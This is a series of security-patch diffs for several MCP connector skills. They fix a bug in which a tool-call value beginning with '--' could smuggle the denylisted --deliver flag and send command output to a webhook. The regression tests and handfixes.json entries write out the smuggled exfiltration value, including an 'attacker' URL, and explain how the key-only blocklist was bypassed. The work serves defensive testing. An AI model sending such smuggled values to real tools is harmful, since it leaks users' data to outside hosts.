@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/autotask/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/autotask/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/autotask/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/autotask/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/autotask/handfixes.json
+++ b/skills/autotask/handfixes.json
@@ -295,8 +295,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -306,7 +318,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/autotask/handfixes.json
+++ b/skills/autotask/handfixes.json
@@ -280,6 +280,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/auvik/CHANGELOG.md
+++ b/skills/auvik/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.2.3] - 2026-09-01

--- a/skills/auvik/CHANGELOG.md
+++ b/skills/auvik/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.2.4]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.2.3] - 2026-09-01
 
 ### Fixed

--- a/skills/auvik/CHANGELOG.md
+++ b/skills/auvik/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.2.3] - 2026-09-01
 

--- a/skills/auvik/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/auvik/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/auvik/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/auvik/cli/internal/mcp/cobratree/shellout.go
@@ -345,6 +345,13 @@ func cliArgsFromMCP(args map[string]any, blocked map[string]bool) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -354,10 +361,10 @@ func cliArgsFromMCP(args map[string]any, blocked map[string]bool) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -365,11 +372,11 @@ func cliArgsFromMCP(args map[string]any, blocked map[string]bool) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/auvik/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/auvik/cli/internal/mcp/cobratree/shellout_test.go
@@ -89,7 +89,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"profile":  true,
 		"token":    true,
 	})
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -118,7 +118,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in, map[string]bool{"args": true})
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -174,7 +174,7 @@ func TestBlockedStructuredArgsOnlyDropsInheritedRootFlags(t *testing.T) {
 		"config":  "/tmp/evil.yaml",
 		"json":    "true",
 	}, blocked)
-	want := []string{"--json", "true", "--profile", "local-profile"}
+	want := []string{"--json=true", "--profile=local-profile"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP command-aware blocklist: got %v, want %v", got, want)
 	}
@@ -392,7 +392,7 @@ func TestCLIArgsFromMCPSkipsStructuredPositionals(t *testing.T) {
 		"id":       "123",
 		"format":   "json",
 	}, blocked)
-	want := []string{"--format", "json"}
+	want := []string{"--format=json"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP forwarded positionals as flags: got %v, want %v", got, want)
 	}
@@ -831,4 +831,113 @@ func toolResultText(result *mcplib.CallToolResult) string {
 		return ""
 	}
 	return text.Text
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled}, blockedRootFlags)
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args, blockedRootFlags) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
+}
+
+// TestShellOutJoinsValuesSoTheyCannotSmuggleRootFlags is the end-to-end
+// half of mcp-argv-value-joined: the argv the child process actually
+// receives. The exploited shape was a doctor tool call whose json value
+// carried a denylisted --deliver.
+func TestShellOutJoinsValuesSoTheyCannotSmuggleRootFlags(t *testing.T) {
+	bin := writeArgvHelper(t)
+	handler := shellOutToCLI(
+		func() (string, error) { return bin, nil },
+		[]string{"doctor"},
+		map[string]bool{"args": true, "deliver": true},
+		map[string]bool{"json": true},
+		nil,
+		true,
+		nil,
+	)
+
+	result, err := handler(context.Background(), mcplib.CallToolRequest{Params: mcplib.CallToolParams{
+		Arguments: map[string]any{"json": "--deliver=webhook:https://x/"},
+	}})
+	if err != nil {
+		t.Fatalf("handler returned transport error: %v", err)
+	}
+	if result.IsError {
+		t.Fatalf("handler returned tool error: %s", toolResultText(result))
+	}
+	got := decodeArgvResult(t, result)
+	want := []string{"doctor", "--json=--deliver=webhook:https://x/"}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("shellout argv = %#v, want %#v", got, want)
+	}
+	for _, tok := range got {
+		if strings.HasPrefix(tok, "--deliver") {
+			t.Fatalf("a tool-call value reached the child as its own --deliver argv element: %#v", got)
+		}
+	}
 }

--- a/skills/auvik/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/auvik/cli/internal/mcp/cobratree/shellout_test.go
@@ -892,15 +892,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args, blockedRootFlags) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args, blockedRootFlags)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/auvik/handfixes.json
+++ b/skills/auvik/handfixes.json
@@ -274,8 +274,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -285,7 +297,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/auvik/handfixes.json
+++ b/skills/auvik/handfixes.json
@@ -259,6 +259,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/avanan/CHANGELOG.md
+++ b/skills/avanan/CHANGELOG.md
@@ -12,9 +12,11 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  The recipe shortcut tools, which build their own command line, now also refuse a value
+  that begins with `-` where a plain value is expected.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.3] - 2026-09-01
 

--- a/skills/avanan/CHANGELOG.md
+++ b/skills/avanan/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   The recipe shortcut tools, which build their own command line, now also refuse a value
   that begins with `-` where a plain value is expected.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.

--- a/skills/avanan/CHANGELOG.md
+++ b/skills/avanan/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.4]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.3] - 2026-09-01
 
 ### Fixed

--- a/skills/avanan/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/avanan/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/avanan/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/avanan/cli/internal/mcp/cobratree/shellout.go
@@ -345,6 +345,13 @@ func cliArgsFromMCP(args map[string]any, blocked map[string]bool) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -354,10 +361,10 @@ func cliArgsFromMCP(args map[string]any, blocked map[string]bool) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -365,11 +372,11 @@ func cliArgsFromMCP(args map[string]any, blocked map[string]bool) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

